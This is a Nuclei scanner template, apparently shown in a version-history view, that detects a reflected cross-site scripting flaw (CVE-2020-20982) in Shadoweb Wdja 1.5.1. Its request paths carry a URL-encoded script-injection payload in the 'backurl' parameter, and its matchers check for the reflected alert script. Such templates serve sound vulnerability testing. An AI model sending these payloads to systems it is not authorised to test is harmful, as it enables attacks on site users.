nuclei-templates/cves/2020/CVE-2020-20982.yaml

29 lines
826 B
YAML
Raw Normal View History

2021-11-22 15:56:22 +00:00
id: CVE-2020-20982
info:
name: Shadoweb Wdja v1.5.1 xss
author: pikpikcu
severity: medium
reference:
- https://github.com/shadoweb/wdja/issues/1
- https://nvd.nist.gov/vuln/detail/CVE-2020-20982
2021-11-23 03:57:11 +00:00
tags: cve,cve2020,xss,wdja,shadoweb
2021-11-22 15:56:22 +00:00
requests:
- method: GET
path:
2021-11-23 03:57:11 +00:00
- "{{BaseURL}}/php/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
- "{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2021-11-22 15:56:22 +00:00
matchers-condition: and
matchers:
- type: word
condition: and
words:
2021-11-23 03:57:11 +00:00
- '</script><script>alert(document.domain)</script>'
2021-11-22 15:56:22 +00:00
- type: word
part: header
words:
- 'text/html'